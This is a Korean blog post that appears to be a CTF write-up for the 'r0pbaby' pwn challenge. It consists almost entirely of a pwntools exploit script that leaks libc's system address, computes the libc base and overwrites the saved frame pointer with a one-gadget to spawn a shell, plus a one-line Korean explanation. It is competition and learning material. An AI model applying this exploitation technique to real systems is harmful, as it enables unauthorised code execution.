pwn - r0pbaby
2021. 2. 5. 08:41ㆍCTF's Write-up
from pwn import *
context.log_level = "debug"
r = process("./r0pbaby")
e = ELF("./r0pbaby")
l = e.libc
shell = [0x4f3d5, 0x4f432, 0x10a41c]
system_off = l.sym['system']
r.sendlineafter(": ", "2")
r.sendlineafter(": ", "system")
r.recvuntil(": ")
leak = int(r.recv(18), 16)
libc_base = leak - system_off
one_shot = libc_base + shell[0]
log.info("leak = " + hex(leak))
log.info("libc_base = " + hex(libc_base))
log.info("one_shot = " + hex(one_shot))
pay = ""
pay += "A"*0x8
pay += p64(one_shot)
r.sendlineafter(": ", "3")
r.sendlineafter(": ", str(len(pay)))
r.sendline(pay)
r.interactive()
memcpy 부분에서 savedregs로 옮기는데 이 부분에서 savedregs가 sfp여서 쓱싹 해주면 된다.
'CTF's Write-up' 카테고리의 다른 글
| HackCTF - j0n9hyun's secret (0) | 2021.02.06 |
|---|---|
| Dreamhack - broken-png (0) | 2021.02.04 |
| DreamHack - login-1 (0) | 2021.02.03 |
| rctf - rnote (0) | 2021.01.27 |
| DreamHack - php-1 (0) | 2021.01.12 |